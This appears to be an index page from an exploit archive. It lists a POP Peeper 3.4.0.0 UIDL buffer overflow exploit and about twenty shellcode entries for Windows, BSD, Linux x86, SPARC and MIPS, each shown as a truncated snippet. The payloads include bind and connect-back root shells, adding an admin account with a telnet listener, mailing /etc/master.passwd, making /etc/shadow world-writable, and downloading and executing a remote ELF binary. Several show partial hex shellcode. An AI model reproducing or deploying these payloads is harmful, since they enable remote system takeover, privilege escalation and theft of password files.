Pop Peeper 3.4.0.0 UIDL Buffer Overflow Exploit

!/usr/bin/perl KL0209EXP-poppeeperuidl-bof.pl 02.27.2009 Krakow Labs Development www.krakowlabs.com POP Peeper 3.4.0.0 UIDL Remote Buffer Overflow Exploit SEH overwrite exploitation, uses Imap.dll included with POP Peeper for universal exploitation gotta love no /SafeSEH. Special thanks goes to...

win32 telnetbind by winexec 111 bytes

Exploit for win32 platform in category shellcode ===================================== win32 telnetbind by winexec 111 bytes ===================================== ; payload:add admin acount & Telnet Listening ; Author: DATASNIPER ; size:111 bytes ; platform:WIN32/XP SP2 FR ; thanks:Arab4services...

win32 PEB!NtGlobalFlags shellcode 14 bytes

Exploit for win32 platform in category shellcode ========================================== win32 PEB!NtGlobalFlags shellcode 14 bytes ========================================== / PEB!NtGlobalFlags 14 BYTES Author: Koshi Description: Uses PEB method to determine whether a debugger is attached to...

BSD/32bits - Passive Connection - 126 bytes

No description provided by source. ; Passive Connection Shellcode ; ; Coded by Scrippie - [email protected] - http://b0f.freebsd.lublin.pl ; Buffer0verfl0w Security ; Why? This evades firewalls... ; ; YES, this is for NASM, I detest AT&T syntaxis - it's gross and unreadable ; ; This is the FreeBSD...

BSD/x86 - setuid/portbind - 94 bytes

No description provided by source. / $Id: portbind-bsd.c,v 1.3 2004/06/02 12:22:30 raptor Exp $ portbind-bsd.c - setuid/portbind shellcode for BSD/x86 Copyright c 2003 Marco Ivaldi [email protected] Simple portbind shellcode that bind's a setuid0 shell on port 31337/tcp based on bighawk's...

BSD/x86 - setuid/execve - 30 bytes

No description provided by source. / $Id: setuid-bsd.c,v 1.6 2004/06/02 12:22:30 raptor Exp $ setuid-bsd.c - setuid/execve shellcode for BSD/x86 Copyright c 2003 Marco Ivaldi [email protected] Short setuid0 and /bin/sh execve shellcode based on esdee's code. Tested on OpenBSD and FreeBSD. / ...

BSD/x86 - cat /etc/master.passwd & mail root@localhost - 92 bytes

No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 92 bytes. execve/bin/sh -c "/bin/cat /etc/master.passwd|mail root@localhost"; pueden reemplzar el comando por lo que se les ocurra. / char shellcode= "\xeb\x25" / jmp shellcode+39 / "\x59" / popl...

BSD/x86 - execve(/bin/sh) - 27 bytes

No description provided by source. / execvesh.c by n0gada 27 bytes. / include "stdio.h" char shellcode= "\xeb\x0d\x5f\x31\xc0\x50\x89\xe2" "\x52\x57\x54\xb0\x3b\xcd\x80\xe8" "\xee\xff\xff\xff/bin/sh"; int mainvoid int ret; printf"%d\n",strlenshellcode; ret = int &ret+2; ret = intshellcode; return...

BSD/x86 - execve(/bin/sh) & setuid(0) - 29 bytes

No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 29 bytes. -setuid0; -execve/bin/sh; / char shellcode= "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\xb0\x17" // mov $0x17,%al "\x50" // push %eax "\xcd\x80" // int $0x80 "\x50" // push %eax...

Linux/x86 - chmod 666 /etc/shadow - 41 bytes

No description provided by source. / [email protected] 0x04abril0x7d2 int syschmodconst char filename, modet mode ... Utilizando la interrupcion 15chmod, asignando el octal 0666 al archivo deseado. En este caso /etc/shadow Hice unas modificaciones en el codigo y solo pude reducir la...

Linux/sparc - [setreuid(0,0); execve() of /bin/sh] - 64 bytes

No description provided by source. / Linux/SPARC setreuid0,0; execve of /bin/sh shellcode. / char c0de = / anathema [email protected] / / setreuid0,0; / "\x82\x10\x20\x7e" / mov 126, %g1 / "\x92\x22\x40\x09" / sub %o1, %o1, %o1 / "\x90\x0a\x40\x09" / and %o1, %o1, %o0 / "\x91\xd0\x20\x10" / ta...

Linux/x86 - HTTP/1.x GET, Downloads & execve()

No description provided by source. / linux/x86 - HTTP/1.x GET, Downloads and execve - 111 bytes+ This shellcode allows you to download a ELF executable straight off a standard HTTP server and launch it. It will saved locally it into a filename called 'A' in the current directory. CONFIGURATION Th...

Linux/x86 - symlink /bin/sh xoring

No description provided by source. /The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. short version with anti IDS xoring size = 56 bytes OS = BSD written by /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short callme main: pop esi xor ecx,e...

Linux/x86 - connect-back 127.0.0.1:31337/tcp - 74 bytes

No description provided by source. / linux/x86 connect-back shellcode, 127.0.0.1:31337/tcp - 74 bytes - izik [email protected] / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" /...

Linux/sparc - setreuid(0,0)&standard execve(). 72 bytes

No description provided by source. / Linux/SPARC setreuid0, 0; necessary, /bin/sh drops privs, standard execve. / char c0de = / by michel kaempf / / setuid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x17\x91\xd0\x20\x10" / setgid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x2e\x91\xd0\x20\x10" / Aleph One : /...

Linux/x86 - System Beep

No description provided by source. / By Thomas Rinsma meatth0mas.nl 16 apr. 2008 Shellcode makes system speaker beep once, 45 bytes: ; int fd = open"/dev/tty10", ORDONLY; push byte 5 pop eax cdq push edx push 0x30317974 push 0x742f2f2f push 0x7665642f mov ebx, esp mov ecx, edx int 80h ; ioctlfd,...

Linux/x86 - execve(/bin/sh) - 16 bytes

No description provided by source. / $Id: reusage-linux.c,v 1.3 2004/01/30 20:08:46 raptor Exp $ reusage-linux.c - re-use of "/bin/sh" string in .rodata Copyright c 2003 Marco Ivaldi [email protected] Short local shellcode for /bin/sh execve. It re-uses the "/bin/sh" string stored in the...

Linux/x86 - bind '/bin/sh' to 31337/tcp & fork() - 98 bytes

No description provided by source. / linux/x86 bind '/bin/sh' to 31337/tcp + fork - 98 bytes - izik [email protected] / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" // push $0...

Linux/x86 - connect-back "11.22.33.44",31337/tcp - 90 bytes

No description provided by source. /--------------------------------------------------------------------------- 90 byte Connect Back shellcode by Russell Sanford - [email protected] --------------------------------------------------------------------------- filename: x86-linux-connect-back.c info:...

Linux/mips - execve("/bin/sh",["/bin/sh"],[]); - 60 bytes

No description provided by source. / - MIPS little-endian - linux execve 60 bytes shellcode - execve"/bin/sh","/bin/sh",; - tested on Linksys WRT54G/GL DD-WRT Linux - based on scut paper Writing MIPS/Irix shellcode vaicebine at gmail dot com / include "stdio.h" char shellcode = "\x50\x73\x06\x24"...